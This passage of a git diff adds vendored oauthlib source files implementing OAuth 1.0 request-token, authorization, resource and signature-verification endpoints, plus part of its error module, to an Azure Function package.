+ headers=None, realms=None, credentials=None):
+ """Create an authorization response, with a new request token if valid.
+
+ :param uri: The full URI of the token request.
+ :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc.
+ :param body: The request body as a string.
+ :param headers: The request headers as a dict.
+ :param credentials: A dict of credentials to include in the verifier.
+ :returns: A tuple of 3 elements.
+ 1. A dict of headers to set on the response.
+ 2. The response body as a string.
+ 3. The response status code as an integer.
+
+ If the callback URI tied to the current token is "oob", a response with
+ a 200 status code will be returned.
In this case, it may be desirable to + modify the response to better display the verifier to the client. + + An example of an authorization request:: + + >>> from your_validator import your_validator + >>> from oauthlib.oauth1 import AuthorizationEndpoint + >>> endpoint = AuthorizationEndpoint(your_validator) + >>> h, b, s = endpoint.create_authorization_response( + ... 'https://your.provider/authorize?oauth_token=...', + ... credentials={ + ... 'extra': 'argument', + ... }) + >>> h + {'Location': 'https://the.client/callback?oauth_verifier=...&extra=argument'} + >>> b + None + >>> s + 302 + + An example of a request with an "oob" callback:: + + >>> from your_validator import your_validator + >>> from oauthlib.oauth1 import AuthorizationEndpoint + >>> endpoint = AuthorizationEndpoint(your_validator) + >>> h, b, s = endpoint.create_authorization_response( + ... 'https://your.provider/authorize?foo=bar', + ... credentials={ + ... 'extra': 'argument', + ... }) + >>> h + {'Content-Type': 'application/x-www-form-urlencoded'} + >>> b + 'oauth_verifier=...&extra=argument' + >>> s + 200 + """ + request = self._create_request(uri, http_method=http_method, body=body, + headers=headers) + + if not request.resource_owner_key: + raise errors.InvalidRequestError( + 'Missing mandatory parameter oauth_token.') + if not self.request_validator.verify_request_token( + request.resource_owner_key, request): + raise errors.InvalidClientError() + + request.realms = realms + if (request.realms and not self.request_validator.verify_realms( + request.resource_owner_key, request.realms, request)): + raise errors.InvalidRequestError( + description=('User granted access to realms outside of ' + 'what the client may request.')) + + verifier = self.create_verifier(request, credentials or {}) + redirect_uri = self.request_validator.get_redirect_uri( + request.resource_owner_key, request) + if redirect_uri == 'oob': + response_headers = { + 'Content-Type': 'application/x-www-form-urlencoded'} + response_body = urlencode(verifier) + return response_headers, response_body, 200 + else: + populated_redirect = add_params_to_uri( + redirect_uri, verifier.items()) + return {'Location': populated_redirect}, None, 302 + + def get_realms_and_credentials(self, uri, http_method='GET', body=None, + headers=None): + """Fetch realms and credentials for the presented request token. + + :param uri: The full URI of the token request. + :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc. + :param body: The request body as a string. + :param headers: The request headers as a dict. + :returns: A tuple of 2 elements. + 1. A list of request realms. + 2. A dict of credentials which may be useful in creating the + authorization form. 
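+
+ An example of typical use (a sketch; ``your_validator`` is a
+ placeholder for your own implementation)::
+
+ >>> from oauthlib.oauth1 import AuthorizationEndpoint
+ >>> endpoint = AuthorizationEndpoint(your_validator)
+ >>> realms, credentials = endpoint.get_realms_and_credentials(
+ ... 'https://your.provider/authorize?oauth_token=...')
+ >>> credentials
+ {'resource_owner_key': '...'}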
+ """ + request = self._create_request(uri, http_method=http_method, body=body, + headers=headers) + + if not self.request_validator.verify_request_token( + request.resource_owner_key, request): + raise errors.InvalidClientError() + + realms = self.request_validator.get_realms( + request.resource_owner_key, request) + return realms, {'resource_owner_key': request.resource_owner_key} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/base.py new file mode 100644 index 0000000..c5e9449 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/base.py @@ -0,0 +1,245 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth1.rfc5849.endpoints.base +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for signing and checking OAuth 1.0 RFC 5849 requests. +""" +import time + +from oauthlib.common import CaseInsensitiveDict, Request, generate_token + +from .. import ( + CONTENT_TYPE_FORM_URLENCODED, + SIGNATURE_HMAC_SHA1, SIGNATURE_HMAC_SHA256, SIGNATURE_HMAC_SHA512, + SIGNATURE_RSA_SHA1, SIGNATURE_RSA_SHA256, SIGNATURE_RSA_SHA512, + SIGNATURE_PLAINTEXT, + SIGNATURE_TYPE_AUTH_HEADER, SIGNATURE_TYPE_BODY, + SIGNATURE_TYPE_QUERY, errors, signature, utils) + + +class BaseEndpoint: + + def __init__(self, request_validator, token_generator=None): + self.request_validator = request_validator + self.token_generator = token_generator or generate_token + + def _get_signature_type_and_params(self, request): + """Extracts parameters from query, headers and body. Signature type + is set to the source in which parameters were found. + """ + # Per RFC5849, only the Authorization header may contain the 'realm' + # optional parameter. 
+ header_params = signature.collect_parameters(headers=request.headers,
+ exclude_oauth_signature=False, with_realm=True)
+ body_params = signature.collect_parameters(body=request.body,
+ exclude_oauth_signature=False)
+ query_params = signature.collect_parameters(uri_query=request.uri_query,
+ exclude_oauth_signature=False)
+
+ params = []
+ params.extend(header_params)
+ params.extend(body_params)
+ params.extend(query_params)
+ signature_types_with_oauth_params = list(filter(lambda s: s[2], (
+ (SIGNATURE_TYPE_AUTH_HEADER, params,
+ utils.filter_oauth_params(header_params)),
+ (SIGNATURE_TYPE_BODY, params,
+ utils.filter_oauth_params(body_params)),
+ (SIGNATURE_TYPE_QUERY, params,
+ utils.filter_oauth_params(query_params))
+ )))
+
+ if len(signature_types_with_oauth_params) > 1:
+ found_types = [s[0] for s in signature_types_with_oauth_params]
+ raise errors.InvalidRequestError(
+ description=('oauth_ params must come from only 1 signature '
+ 'type but were found in %s' %
+ ', '.join(found_types)))
+
+ try:
+ signature_type, params, oauth_params = signature_types_with_oauth_params[
+ 0]
+ except IndexError:
+ raise errors.InvalidRequestError(
+ description='Missing mandatory OAuth parameters.')
+
+ return signature_type, params, oauth_params
+
+ def _create_request(self, uri, http_method, body, headers):
+ # Only include body data from x-www-form-urlencoded requests
+ headers = CaseInsensitiveDict(headers or {})
+ if ("Content-Type" in headers and
+ CONTENT_TYPE_FORM_URLENCODED in headers["Content-Type"]):
+ request = Request(uri, http_method, body, headers)
+ else:
+ request = Request(uri, http_method, '', headers)
+
+ signature_type, params, oauth_params = (
+ self._get_signature_type_and_params(request))
+
+ # The server SHOULD return a 400 (Bad Request) status code when
+ # receiving a request with duplicated protocol parameters.
+ if len(dict(oauth_params)) != len(oauth_params):
+ raise errors.InvalidRequestError(
+ description='Duplicate OAuth1 entries.')
+
+ oauth_params = dict(oauth_params)
+ request.signature = oauth_params.get('oauth_signature')
+ request.client_key = oauth_params.get('oauth_consumer_key')
+ request.resource_owner_key = oauth_params.get('oauth_token')
+ request.nonce = oauth_params.get('oauth_nonce')
+ request.timestamp = oauth_params.get('oauth_timestamp')
+ request.redirect_uri = oauth_params.get('oauth_callback')
+ request.verifier = oauth_params.get('oauth_verifier')
+ request.signature_method = oauth_params.get('oauth_signature_method')
+ request.realm = dict(params).get('realm')
+ request.oauth_params = oauth_params
+
+ # Parameters to Client depend on signature method which may vary
+ # for each request. Note that HMAC-SHA1 and PLAINTEXT share parameters
+ request.params = [(k, v) for k, v in params if k != "oauth_signature"]
+
+ if 'realm' in request.headers.get('Authorization', ''):
+ request.params = [(k, v)
+ for k, v in request.params if k != "realm"]
+
+ return request
+
+ def _check_transport_security(self, request):
+ # TODO: move into oauthlib.common from oauth2.utils
+ if (self.request_validator.enforce_ssl and
+ not request.uri.lower().startswith("https://")):
+ raise errors.InsecureTransportError()
+
+ def _check_mandatory_parameters(self, request):
+ # The server SHOULD return a 400 (Bad Request) status code when
+ # receiving a request with missing parameters.
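+ # Note: this implementation treats oauth_timestamp and oauth_nonce as
+ # mandatory for all signature methods, although `Section 3.1`_ allows
+ # them to be omitted when using PLAINTEXT.
+ # .. _`Section 3.1`: https://tools.ietf.org/html/rfc5849#section-3.1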
+ if not all((request.signature, request.client_key,
+ request.nonce, request.timestamp,
+ request.signature_method)):
+ raise errors.InvalidRequestError(
+ description='Missing mandatory OAuth parameters.')
+
+ # OAuth does not mandate a particular signature method, as each
+ # implementation can have its own unique requirements. Servers are
+ # free to implement and document their own custom methods.
+ # Recommending any particular method is beyond the scope of this
+ # specification. Implementers should review the Security
+ # Considerations section (`Section 4`_) before deciding on which
+ # method to support.
+ # .. _`Section 4`: https://tools.ietf.org/html/rfc5849#section-4
+ if (request.signature_method not in
+ self.request_validator.allowed_signature_methods):
+ raise errors.InvalidSignatureMethodError(
+ description="Invalid signature, {} not in {!r}.".format(
+ request.signature_method,
+ self.request_validator.allowed_signature_methods))
+
+ # Servers receiving an authenticated request MUST validate it by:
+ # If the "oauth_version" parameter is present, ensuring its value is
+ # "1.0".
+ if ('oauth_version' in request.oauth_params and
+ request.oauth_params['oauth_version'] != '1.0'):
+ raise errors.InvalidRequestError(
+ description='Invalid OAuth version.')
+
+ # The timestamp value MUST be a positive integer. Unless otherwise
+ # specified by the server's documentation, the timestamp is expressed
+ # in the number of seconds since January 1, 1970 00:00:00 GMT.
+ if len(request.timestamp) != 10:
+ raise errors.InvalidRequestError(
+ description='Invalid timestamp size.')
+
+ try:
+ ts = int(request.timestamp)
+ except ValueError:
+ raise errors.InvalidRequestError(
+ description='Timestamp must be an integer.')
+ else:
+ # To avoid the need to retain an infinite number of nonce values for
+ # future checks, servers MAY choose to restrict the time period after
+ # which a request with an old timestamp is rejected.
+ if abs(time.time() - ts) > self.request_validator.timestamp_lifetime:
+ raise errors.InvalidRequestError(
+ description=('Timestamp given is invalid, differs from '
+ 'allowed by over %s seconds.' % (
+ self.request_validator.timestamp_lifetime)))
+
+ # Provider specific validation of parameters, used to enforce
+ # restrictions such as character set and length.
+ if not self.request_validator.check_client_key(request.client_key):
+ raise errors.InvalidRequestError(
+ description='Invalid client key format.')
+
+ if not self.request_validator.check_nonce(request.nonce):
+ raise errors.InvalidRequestError(
+ description='Invalid nonce format.')
+
+ def _check_signature(self, request, is_token_request=False):
+ # ---- RSA Signature verification ----
+ if request.signature_method in (SIGNATURE_RSA_SHA1,
+ SIGNATURE_RSA_SHA256,
+ SIGNATURE_RSA_SHA512):
+ # RSA-based signature method
+
+ # The server verifies the signature per `[RFC3447] section 8.2.2`_
+ # .. _`[RFC3447] section 8.2.2`: https://tools.ietf.org/html/rfc3447#section-8.2.2
+
+ rsa_key = self.request_validator.get_rsa_key(
+ request.client_key, request)
+
+ if request.signature_method == SIGNATURE_RSA_SHA1:
+ valid_signature = signature.verify_rsa_sha1(request, rsa_key)
+ elif request.signature_method == SIGNATURE_RSA_SHA256:
+ valid_signature = signature.verify_rsa_sha256(request, rsa_key)
+ elif request.signature_method == SIGNATURE_RSA_SHA512:
+ valid_signature = signature.verify_rsa_sha512(request, rsa_key)
+ else:
+ valid_signature = False
+
+ # ---- HMAC or Plaintext Signature verification ----
+ else:
+ # Non-RSA based signature method
+
+ # Servers receiving an authenticated request MUST validate it by:
+ # Recalculating the request signature independently as described in
+ # `Section 3.4`_ and comparing it to the value received from the
+ # client via the "oauth_signature" parameter.
+ # .. _`Section 3.4`: https://tools.ietf.org/html/rfc5849#section-3.4
+
+ client_secret = self.request_validator.get_client_secret(
+ request.client_key, request)
+
+ resource_owner_secret = None
+ if request.resource_owner_key:
+ if is_token_request:
+ resource_owner_secret = \
+ self.request_validator.get_request_token_secret(
+ request.client_key, request.resource_owner_key,
+ request)
+ else:
+ resource_owner_secret = \
+ self.request_validator.get_access_token_secret(
+ request.client_key, request.resource_owner_key,
+ request)
+
+ if request.signature_method == SIGNATURE_HMAC_SHA1:
+ valid_signature = signature.verify_hmac_sha1(
+ request, client_secret, resource_owner_secret)
+ elif request.signature_method == SIGNATURE_HMAC_SHA256:
+ valid_signature = signature.verify_hmac_sha256(
+ request, client_secret, resource_owner_secret)
+ elif request.signature_method == SIGNATURE_HMAC_SHA512:
+ valid_signature = signature.verify_hmac_sha512(
+ request, client_secret, resource_owner_secret)
+ elif request.signature_method == SIGNATURE_PLAINTEXT:
+ valid_signature = signature.verify_plaintext(
+ request, client_secret, resource_owner_secret)
+ else:
+ valid_signature = False
+
+ return valid_signature
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/pre_configured.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/pre_configured.py
new file mode 100644
index 0000000..7409468
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/pre_configured.py
@@ -0,0 +1,14 @@
+from . import (
+ AccessTokenEndpoint, AuthorizationEndpoint, RequestTokenEndpoint,
+ ResourceEndpoint,
+)
+
+
+class WebApplicationServer(RequestTokenEndpoint, AuthorizationEndpoint,
+ AccessTokenEndpoint, ResourceEndpoint):
+
+ def __init__(self, request_validator):
+ RequestTokenEndpoint.__init__(self, request_validator)
+ AuthorizationEndpoint.__init__(self, request_validator)
+ AccessTokenEndpoint.__init__(self, request_validator)
+ ResourceEndpoint.__init__(self, request_validator)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/request_token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/request_token.py
new file mode 100644
index 0000000..2502798
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/request_token.py
@@ -0,0 +1,209 @@
+# -*- coding: utf-8 -*-
+"""
+oauthlib.oauth1.rfc5849.endpoints.request_token
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This module is an implementation of the request token provider logic of
+OAuth 1.0 RFC 5849. It validates the correctness of request token requests,
+creates and persists tokens, and creates the proper response to be
+returned to the client.
+"""
+import logging
+
+from oauthlib.common import urlencode
+
+from .. import errors
+from .base import BaseEndpoint
+
+log = logging.getLogger(__name__)
+
+
+class RequestTokenEndpoint(BaseEndpoint):
+
+ """An endpoint responsible for providing OAuth 1 request tokens.
+
+ Typical use is to instantiate with a request validator and invoke the
+ ``create_request_token_response`` from a view function. The tuple returned
+ has all information necessary (body, status, headers) to quickly form
+ and return a proper response. See :doc:`/oauth1/validator` for details on which
+ validator methods to implement for this endpoint.
+ """
+
+ def create_request_token(self, request, credentials):
+ """Create and save a new request token.
+
+ :param request: OAuthlib request.
+ :type request: oauthlib.common.Request
+ :param credentials: A dict of extra token credentials.
+ :returns: The token as an urlencoded string.
+ """
+ token = {
+ 'oauth_token': self.token_generator(),
+ 'oauth_token_secret': self.token_generator(),
+ 'oauth_callback_confirmed': 'true'
+ }
+ token.update(credentials)
+ self.request_validator.save_request_token(token, request)
+ return urlencode(token.items())
+
+ def create_request_token_response(self, uri, http_method='GET', body=None,
+ headers=None, credentials=None):
+ """Create a request token response, with a new request token if valid.
+
+ :param uri: The full URI of the token request.
+ :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc.
+ :param body: The request body as a string.
+ :param headers: The request headers as a dict.
+ :param credentials: A dict of extra credentials to include in the token.
+ :returns: A tuple of 3 elements.
+ 1. A dict of headers to set on the response.
+ 2. The response body as a string.
+ 3. The response status code as an integer.
+
+ An example of a valid request::
+
+ >>> from your_validator import your_validator
+ >>> from oauthlib.oauth1 import RequestTokenEndpoint
+ >>> endpoint = RequestTokenEndpoint(your_validator)
+ >>> h, b, s = endpoint.create_request_token_response(
+ ... 'https://your.provider/request_token?foo=bar',
+ ... headers={
+ ... 'Authorization': 'OAuth realm=movies user, oauth_....'
+ ... },
+ ... credentials={
+ ... 'my_specific': 'argument',
+ ... })
+ >>> h
+ {'Content-Type': 'application/x-www-form-urlencoded'}
+ >>> b
+ 'oauth_token=lsdkfol23w54jlksdef&oauth_token_secret=qwe089234lkjsdf&oauth_callback_confirmed=true&my_specific=argument'
+ >>> s
+ 200
+
+ A response to an invalid request would have a different body and status::
+
+ >>> b
+ 'error=invalid_request&description=missing+callback+uri'
+ >>> s
+ 400
+
+ The same goes for an unauthorized request:
+
+ >>> b
+ ''
+ >>> s
+ 401
+ """
+ resp_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+ try:
+ request = self._create_request(uri, http_method, body, headers)
+ valid, processed_request = self.validate_request_token_request(
+ request)
+ if valid:
+ token = self.create_request_token(request, credentials or {})
+ return resp_headers, token, 200
+ else:
+ return {}, None, 401
+ except errors.OAuth1Error as e:
+ return resp_headers, e.urlencoded, e.status_code
+
+ def validate_request_token_request(self, request):
+ """Validate a request token request.
+
+ :param request: OAuthlib request.
+ :type request: oauthlib.common.Request
+ :raises: OAuth1Error if the request is invalid.
+ :returns: A tuple of 2 elements.
+ 1. The validation result (True or False).
+ 2. The request object.
+ """
+ self._check_transport_security(request)
+ self._check_mandatory_parameters(request)
+
+ if request.realm:
+ request.realms = request.realm.split(' ')
+ else:
+ request.realms = self.request_validator.get_default_realms(
+ request.client_key, request)
+ if not self.request_validator.check_realms(request.realms):
+ raise errors.InvalidRequestError(
+ description='Invalid realm {}. Allowed are {!r}.'.format(
+ request.realms, self.request_validator.realms))
+
+ if not request.redirect_uri:
+ raise errors.InvalidRequestError(
+ description='Missing callback URI.')
+
+ if not self.request_validator.validate_timestamp_and_nonce(
+ request.client_key, request.timestamp, request.nonce, request,
+ request_token=request.resource_owner_key):
+ return False, request
+
+ # The server SHOULD return a 401 (Unauthorized) status code when
+ # receiving a request with invalid client credentials.
+ # Note: This is postponed in order to avoid timing attacks, instead
+ # a dummy client is assigned and used to maintain near constant
+ # time request verification.
+ #
+ # Note that early exit would enable client enumeration
+ valid_client = self.request_validator.validate_client_key(
+ request.client_key, request)
+ if not valid_client:
+ request.client_key = self.request_validator.dummy_client
+
+ # Note that `realm`_ is only used in authorization headers and how
+ # it should be interpreted is not included in the OAuth spec.
+ # However they could be seen as a scope or realm to which the
+ # client has access and as such every client should be checked
+ # to ensure it is authorized access to that scope or realm.
+ # .. _`realm`: https://tools.ietf.org/html/rfc2617#section-1.2
+ #
+ # Note that early exit would enable client realm access enumeration.
+ #
+ # The require_realm indicates this is the first step in the OAuth
+ # workflow where a client requests access to a specific realm.
+ # This first step (obtaining request token) need not require a realm
+ # and can then be identified by checking the require_resource_owner
+ # flag and absence of realm.
+ #
+ # Clients obtaining an access token will not supply a realm and it will
+ # not be checked.
Instead the previously requested realm should be + # transferred from the request token to the access token. + # + # Access to protected resources will always validate the realm but note + # that the realm is now tied to the access token and not provided by + # the client. + valid_realm = self.request_validator.validate_requested_realms( + request.client_key, request.realms, request) + + # Callback is normally never required, except for requests for + # a Temporary Credential as described in `Section 2.1`_ + # .._`Section 2.1`: https://tools.ietf.org/html/rfc5849#section-2.1 + valid_redirect = self.request_validator.validate_redirect_uri( + request.client_key, request.redirect_uri, request) + if not request.redirect_uri: + raise NotImplementedError('Redirect URI must either be provided ' + 'or set to a default during validation.') + + valid_signature = self._check_signature(request) + + # log the results to the validator_log + # this lets us handle internal reporting and analysis + request.validator_log['client'] = valid_client + request.validator_log['realm'] = valid_realm + request.validator_log['callback'] = valid_redirect + request.validator_log['signature'] = valid_signature + + # We delay checking validity until the very end, using dummy values for + # calculations and fetching secrets/keys to ensure the flow of every + # request remains almost identical regardless of whether valid values + # have been supplied. This ensures near constant time execution and + # prevents malicious users from guessing sensitive information + v = all((valid_client, valid_realm, valid_redirect, valid_signature)) + if not v: + log.info("[Failure] request verification failed.") + log.info("Valid client: %s.", valid_client) + log.info("Valid realm: %s.", valid_realm) + log.info("Valid callback: %s.", valid_redirect) + log.info("Valid signature: %s.", valid_signature) + return v, request diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/resource.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/resource.py new file mode 100644 index 0000000..86f44ac --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/resource.py @@ -0,0 +1,163 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth1.rfc5849.endpoints.resource +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of the resource protection provider logic of +OAuth 1.0 RFC 5849. +""" +import logging + +from .. import errors +from .base import BaseEndpoint + +log = logging.getLogger(__name__) + + +class ResourceEndpoint(BaseEndpoint): + + """An endpoint responsible for protecting resources. + + Typical use is to instantiate with a request validator and invoke the + ``validate_protected_resource_request`` in a decorator around a view + function. If the request is valid, invoke and return the response of the + view. If invalid create and return an error response directly from the + decorator. + + See :doc:`/oauth1/validator` for details on which validator methods to implement + for this endpoint. 
+
+ An example decorator::
+
+ from functools import wraps
+ from your_validator import your_validator
+ from oauthlib.oauth1 import ResourceEndpoint
+ endpoint = ResourceEndpoint(your_validator)
+
+ def require_oauth(realms=None):
+ def decorator(f):
+ @wraps(f)
+ def wrapper(request, *args, **kwargs):
+ v, r = endpoint.validate_protected_resource_request(
+ request.url,
+ http_method=request.method,
+ body=request.data,
+ headers=request.headers,
+ realms=realms or [])
+ if v:
+ return f(*args, **kwargs)
+ else:
+ return abort(403)
+ return wrapper
+ return decorator
+ """
+
+ def validate_protected_resource_request(self, uri, http_method='GET',
+ body=None, headers=None, realms=None):
+ """Validate a protected resource request.
+
+ :param uri: The full URI of the token request.
+ :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc.
+ :param body: The request body as a string.
+ :param headers: The request headers as a dict.
+ :param realms: A list of realms the resource is protected under.
+ This will be supplied to the ``validate_realms``
+ method of the request validator.
+ :returns: A tuple of 2 elements.
+ 1. True if valid, False otherwise.
+ 2. An oauthlib.common.Request object.
+ """
+ try:
+ request = self._create_request(uri, http_method, body, headers)
+ except errors.OAuth1Error:
+ return False, None
+
+ try:
+ self._check_transport_security(request)
+ self._check_mandatory_parameters(request)
+ except errors.OAuth1Error:
+ return False, request
+
+ if not request.resource_owner_key:
+ return False, request
+
+ if not self.request_validator.check_access_token(
+ request.resource_owner_key):
+ return False, request
+
+ if not self.request_validator.validate_timestamp_and_nonce(
+ request.client_key, request.timestamp, request.nonce, request,
+ access_token=request.resource_owner_key):
+ return False, request
+
+ # The server SHOULD return a 401 (Unauthorized) status code when
+ # receiving a request with invalid client credentials.
+ # Note: This is postponed in order to avoid timing attacks, instead
+ # a dummy client is assigned and used to maintain near constant
+ # time request verification.
+ #
+ # Note that early exit would enable client enumeration
+ valid_client = self.request_validator.validate_client_key(
+ request.client_key, request)
+ if not valid_client:
+ request.client_key = self.request_validator.dummy_client
+
+ # The server SHOULD return a 401 (Unauthorized) status code when
+ # receiving a request with an invalid or expired token.
+ # Note: This is postponed in order to avoid timing attacks, instead
+ # a dummy token is assigned and used to maintain near constant
+ # time request verification.
+ #
+ # Note that early exit would enable resource owner enumeration
+ valid_resource_owner = self.request_validator.validate_access_token(
+ request.client_key, request.resource_owner_key, request)
+ if not valid_resource_owner:
+ request.resource_owner_key = self.request_validator.dummy_access_token
+
+ # Note that `realm`_ is only used in authorization headers and how
+ # it should be interpreted is not included in the OAuth spec.
+ # However they could be seen as a scope or realm to which the
+ # client has access and as such every client should be checked
+ # to ensure it is authorized access to that scope or realm.
+ # .. _`realm`: https://tools.ietf.org/html/rfc2617#section-1.2
+ #
+ # Note that early exit would enable client realm access enumeration.
+ #
+ # The require_realm indicates this is the first step in the OAuth
+ # workflow where a client requests access to a specific realm.
+ # This first step (obtaining request token) need not require a realm
+ # and can then be identified by checking the require_resource_owner
+ # flag and absence of realm.
+ #
+ # Clients obtaining an access token will not supply a realm and it will
+ # not be checked. Instead the previously requested realm should be
+ # transferred from the request token to the access token.
+ #
+ # Access to protected resources will always validate the realm but note
+ # that the realm is now tied to the access token and not provided by
+ # the client.
+ valid_realm = self.request_validator.validate_realms(request.client_key,
+ request.resource_owner_key, request, uri=request.uri,
+ realms=realms)
+
+ valid_signature = self._check_signature(request)
+
+ # log the results to the validator_log
+ # this lets us handle internal reporting and analysis
+ request.validator_log['client'] = valid_client
+ request.validator_log['resource_owner'] = valid_resource_owner
+ request.validator_log['realm'] = valid_realm
+ request.validator_log['signature'] = valid_signature
+
+ # We delay checking validity until the very end, using dummy values for
+ # calculations and fetching secrets/keys to ensure the flow of every
+ # request remains almost identical regardless of whether valid values
+ # have been supplied. This ensures near constant time execution and
+ # prevents malicious users from guessing sensitive information
+ v = all((valid_client, valid_resource_owner, valid_realm,
+ valid_signature))
+ if not v:
+ log.info("[Failure] request verification failed.")
+ log.info("Valid client: %s", valid_client)
+ log.info("Valid token: %s", valid_resource_owner)
+ log.info("Valid realm: %s", valid_realm)
+ log.info("Valid signature: %s", valid_signature)
+ return v, request
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/signature_only.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/signature_only.py
new file mode 100644
index 0000000..0c15d16
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/endpoints/signature_only.py
@@ -0,0 +1,82 @@
+# -*- coding: utf-8 -*-
+"""
+oauthlib.oauth1.rfc5849.endpoints.signature_only
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This module is an implementation of the signing logic of OAuth 1.0 RFC 5849.
+"""
+
+import logging
+
+from .. import errors
+from .base import BaseEndpoint
+
+log = logging.getLogger(__name__)
+
+
+class SignatureOnlyEndpoint(BaseEndpoint):
+
+ """An endpoint only responsible for verifying an oauth signature."""
+
+ def validate_request(self, uri, http_method='GET',
+ body=None, headers=None):
+ """Validate a signed OAuth request.
+
+ :param uri: The full URI of the token request.
+ :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc.
+ :param body: The request body as a string.
+ :param headers: The request headers as a dict.
+ :returns: A tuple of 2 elements.
+ 1. True if valid, False otherwise.
+ 2. An oauthlib.common.Request object.
+ """
+ try:
+ request = self._create_request(uri, http_method, body, headers)
+ except errors.OAuth1Error as err:
+ log.info(
+ 'Exception caught while validating request, %s.' % err)
+ return False, None
+
+ try:
+ self._check_transport_security(request)
+ self._check_mandatory_parameters(request)
+ except errors.OAuth1Error as err:
+ log.info(
+ 'Exception caught while validating request, %s.' % err)
+ return False, request
+
+ if not self.request_validator.validate_timestamp_and_nonce(
+ request.client_key, request.timestamp, request.nonce, request):
+ log.debug('[Failure] verification failed: timestamp/nonce')
+ return False, request
+
+ # The server SHOULD return a 401 (Unauthorized) status code when
+ # receiving a request with invalid client credentials.
+ # Note: This is postponed in order to avoid timing attacks, instead
+ # a dummy client is assigned and used to maintain near constant
+ # time request verification.
+ #
+ # Note that early exit would enable client enumeration
+ valid_client = self.request_validator.validate_client_key(
+ request.client_key, request)
+ if not valid_client:
+ request.client_key = self.request_validator.dummy_client
+
+ valid_signature = self._check_signature(request)
+
+ # log the results to the validator_log
+ # this lets us handle internal reporting and analysis
+ request.validator_log['client'] = valid_client
+ request.validator_log['signature'] = valid_signature
+
+ # We delay checking validity until the very end, using dummy values for
+ # calculations and fetching secrets/keys to ensure the flow of every
+ # request remains almost identical regardless of whether valid values
+ # have been supplied. This ensures near constant time execution and
+ # prevents malicious users from guessing sensitive information
+ v = all((valid_client, valid_signature))
+ if not v:
+ log.info("[Failure] request verification failed.")
+ log.info("Valid client: %s", valid_client)
+ log.info("Valid signature: %s", valid_signature)
+ return v, request
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/errors.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/errors.py
new file mode 100644
index 0000000..3bc6cb3
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/errors.py
@@ -0,0 +1,76 @@
+"""
+oauthlib.oauth1.rfc5849.errors
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Errors used by both OAuth 1 clients and providers to represent the spec
+defined error responses.
+"""
+from oauthlib.common import add_params_to_uri, urlencode
+
+
+class OAuth1Error(Exception):
+ error = None
+ description = ''
+
+ def __init__(self, description=None, uri=None, status_code=400,
+ request=None):
+ """
+ description: A human-readable ASCII [USASCII] text providing
+ additional information, used to assist the client
+ developer in understanding the error that occurred.
+ Values for the "error_description" parameter MUST NOT
+ include characters outside the set
+ x20-21 / x23-5B / x5D-7E.
+
+ uri: A URI identifying a human-readable web page with information
+ about the error, used to provide the client developer with
+ additional information about the error. Values for the
+ "error_uri" parameter MUST conform to the URI- Reference
+ syntax, and thus MUST NOT include characters outside the set
+ x21 / x23-5B / x5D-7E.
+
+ state: A CSRF protection value received from the client.
